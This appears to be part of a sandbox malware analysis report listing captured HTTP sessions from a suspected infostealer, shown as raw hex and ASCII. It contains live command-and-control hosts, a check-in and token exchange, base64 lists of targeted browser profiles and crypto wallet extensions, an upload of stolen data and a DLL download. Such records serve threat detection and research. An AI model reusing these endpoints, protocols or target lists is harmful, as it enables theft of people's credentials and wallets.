2024-10-02 07:42:51 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Wed, 02 Oct 2024 07:42:50 GMT Content-Length: 34879 Connection: close Set-Cookie: sessionid=a584570553361378ffd056c0; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-10-02 07:42:51 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-10-02 07:42:51 UTC	16384	IN	Data Raw: 52 54 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 Data Ascii: RT</a></div><script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4
2024-10-02 07:42:51 UTC	3768	IN	Data Raw: 75 6d 6d 61 72 79 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 Data Ascii: ummary"></div><div class="profile_summary_footer"><span data-panel="{"focusable":true,"clickOnActivate":true}" class="whiteLink" class="whiteLink">View more info</span></div><scr
2024-10-02 07:42:51 UTC	213	IN	Data Raw: 63 6b 3d 22 52 65 73 70 6f 6e 73 69 76 65 5f 52 65 71 75 65 73 74 4d 6f 62 69 6c 65 56 69 65 77 28 29 22 3e 0d 0a 09 09 09 09 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: ck="Responsive_RequestMobileView()"><span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.4	49843	49.12.197.9	443	1364	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:42:52 UTC	184	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Connection: Keep-Alive Cache-Control: no-cache
2024-10-02 07:42:52 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:42:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-10-02 07:42:52 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.4	49844	49.12.197.9	443	1364	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:42:53 UTC	276	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAKFCGIJKJKFHIDHIIIE User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 256 Connection: Keep-Alive Cache-Control: no-cache
2024-10-02 07:42:53 UTC	256	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 41 4b 46 43 47 49 4a 4b 4a 4b 46 48 49 44 48 49 49 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 41 39 44 34 38 46 41 44 42 36 44 33 33 39 32 32 35 39 37 34 39 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 46 43 47 49 4a 4b 4a 4b 46 48 49 44 48 49 49 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 46 43 47 49 4a 4b 4a 4b 46 48 49 44 48 49 49 49 45 2d 2d 0d Data Ascii: ------DAKFCGIJKJKFHIDHIIIEContent-Disposition: form-data; name="hwid"1A9D48FADB6D3392259749-a33c7340-61ca------DAKFCGIJKJKFHIDHIIIEContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------DAKFCGIJKJKFHIDHIIIE--
2024-10-02 07:42:54 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:42:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-10-02 07:42:54 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 66 62 62 35 33 63 36 66 63 32 31 66 39 34 31 32 65 65 66 33 33 34 34 61 34 62 64 30 37 35 31 38 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|fbb53c6fc21f9412eef3344a4bd07518\|1\|1\|1\|0\|0\|50000\|10

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.4	49845	104.21.54.163	443	7500	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:42:54 UTC	146	OUT	POST /get_update.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 19 Expect: 100-continue
2024-10-02 07:42:54 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-02 07:42:54 UTC	19	OUT	Data Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33 Data Ascii: current_version=0.3
2024-10-02 07:42:54 UTC	611	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:42:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KwOwiB%2B3285nWECjJHwwOjgkEX27RuzGPAY%2FJmjS%2BHjcfzj9%2BrM8wKFxvrwpfzcCzqc8YkBbGiF8oABI83oHuykh6pkhrBkANnpDGtWPHttvRse46ID1YF%2FtyeASw1hh6Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc30ef4486f4368-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
83	192.168.2.4	49846	49.12.197.9	443

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:42:54 UTC	276	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCFHJKJJJECGDHJJDHDA User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-10-02 07:42:54 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 43 46 48 4a 4b 4a 4a 4a 45 43 47 44 48 4a 4a 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 62 62 35 33 63 36 66 63 32 31 66 39 34 31 32 65 65 66 33 33 34 34 61 34 62 64 30 37 35 31 38 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 48 4a 4b 4a 4a 4a 45 43 47 44 48 4a 4a 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 48 4a 4b 4a 4a 4a 45 43 47 44 48 4a 4a 44 48 44 41 0d 0a 43 6f 6e 74 Data Ascii: ------FCFHJKJJJECGDHJJDHDAContent-Disposition: form-data; name="token"fbb53c6fc21f9412eef3344a4bd07518------FCFHJKJJJECGDHJJDHDAContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------FCFHJKJJJECGDHJJDHDACont
2024-10-02 07:42:55 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:42:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-10-02 07:42:55 UTC	1564	IN	Data Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45 Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.4	49848	104.21.54.163	443	7500	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:42:55 UTC	143	OUT	POST /receive.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-02 07:42:55 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-02 07:42:55 UTC	84	OUT	Data Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 30 34 63 32 32 61 65 35 62 35 64 66 38 38 35 32 35 33 32 62 63 62 35 63 35 34 66 35 38 38 32 34 36 32 35 33 38 66 63 65 63 61 65 36 34 66 64 32 34 39 31 31 33 35 37 33 62 38 37 30 31 30 63 31 Data Ascii: ip=8.46.123.33&hwid=04c22ae5b5df8852532bcb5c54f5882462538fcecae64fd249113573b87010c1
2024-10-02 07:42:56 UTC	643	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:42:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ApOP%2BaexfWbinKaKk6IwSlAoUW1YNezMsgMeVoTMznFzrlZmIdPLn3KRk9KrrJ6hOigeV7ltS%2BLMo4J%2Fq7A%2FZHZH2RlrytetJHRly6n07CPf7rFcx6JCN%2B1vkFClyjK%2F5Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc30efddb4780d3-EWR alt-svc: h3=":443"; ma=86400 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.4	49849	49.12.197.9	443	1364	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:42:56 UTC	276	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IECGIEBAEBFIIECBGCBG User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-10-02 07:42:56 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 45 43 47 49 45 42 41 45 42 46 49 49 45 43 42 47 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 62 62 35 33 63 36 66 63 32 31 66 39 34 31 32 65 65 66 33 33 34 34 61 34 62 64 30 37 35 31 38 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 47 49 45 42 41 45 42 46 49 49 45 43 42 47 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 47 49 45 42 41 45 42 46 49 49 45 43 42 47 43 42 47 0d 0a 43 6f 6e 74 Data Ascii: ------IECGIEBAEBFIIECBGCBGContent-Disposition: form-data; name="token"fbb53c6fc21f9412eef3344a4bd07518------IECGIEBAEBFIIECBGCBGContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------IECGIEBAEBFIIECBGCBGCont
2024-10-02 07:42:56 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:42:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-10-02 07:42:56 UTC	5685	IN	Data Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.4	49851	104.21.54.163	443	7500	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:42:57 UTC	144	OUT	POST /get_file.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-02 07:42:57 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-02 07:42:57 UTC	84	OUT	Data Raw: 68 77 69 64 3d 30 34 63 32 32 61 65 35 62 35 64 66 38 38 35 32 35 33 32 62 63 62 35 63 35 34 66 35 38 38 32 34 36 32 35 33 38 66 63 65 63 61 65 36 34 66 64 32 34 39 31 31 33 35 37 33 62 38 37 30 31 30 63 31 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: hwid=04c22ae5b5df8852532bcb5c54f5882462538fcecae64fd249113573b87010c1&ip=8.46.123.33
2024-10-02 07:42:57 UTC	611	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:42:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HUxt%2FqMbTdOtBjRGsbUMZB56Gc1%2F3zFFVL3XhijEuAJnfMrNDB2wyXKy9%2FwB8COFZiu%2BPpEXamE84cvptcQR%2FKsPaOJD72W5dcjI9vdpD0VerGoflijvJY2qOR7edFOhFQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc30f08296e8c18-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.4	49852	49.12.197.9	443	1364	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:42:57 UTC	276	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAEHJJECAEGCAAAAEGIE User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
2024-10-02 07:42:57 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 41 45 48 4a 4a 45 43 41 45 47 43 41 41 41 41 45 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 62 62 35 33 63 36 66 63 32 31 66 39 34 31 32 65 65 66 33 33 34 34 61 34 62 64 30 37 35 31 38 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 48 4a 4a 45 43 41 45 47 43 41 41 41 41 45 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 48 4a 4a 45 43 41 45 47 43 41 41 41 41 45 47 49 45 0d 0a 43 6f 6e 74 Data Ascii: ------DAEHJJECAEGCAAAAEGIEContent-Disposition: form-data; name="token"fbb53c6fc21f9412eef3344a4bd07518------DAEHJJECAEGCAAAAEGIEContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------DAEHJJECAEGCAAAAEGIECont
2024-10-02 07:42:58 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:42:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-10-02 07:42:58 UTC	119	IN	Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.4	49853	49.12.197.9	443	1364	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:42:59 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IECGIEBAEBFIIECBGCBG User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 6121 Connection: Keep-Alive Cache-Control: no-cache
2024-10-02 07:42:59 UTC	6121	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 45 43 47 49 45 42 41 45 42 46 49 49 45 43 42 47 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 62 62 35 33 63 36 66 63 32 31 66 39 34 31 32 65 65 66 33 33 34 34 61 34 62 64 30 37 35 31 38 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 47 49 45 42 41 45 42 46 49 49 45 43 42 47 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 47 49 45 42 41 45 42 46 49 49 45 43 42 47 43 42 47 0d 0a 43 6f 6e 74 Data Ascii: ------IECGIEBAEBFIIECBGCBGContent-Disposition: form-data; name="token"fbb53c6fc21f9412eef3344a4bd07518------IECGIEBAEBFIIECBGCBGContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------IECGIEBAEBFIIECBGCBGCont
2024-10-02 07:42:59 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:42:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-10-02 07:42:59 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.4	49854	49.12.197.9	443	1364	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:43:00 UTC	192	OUT	GET /sqlp.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Connection: Keep-Alive Cache-Control: no-cache
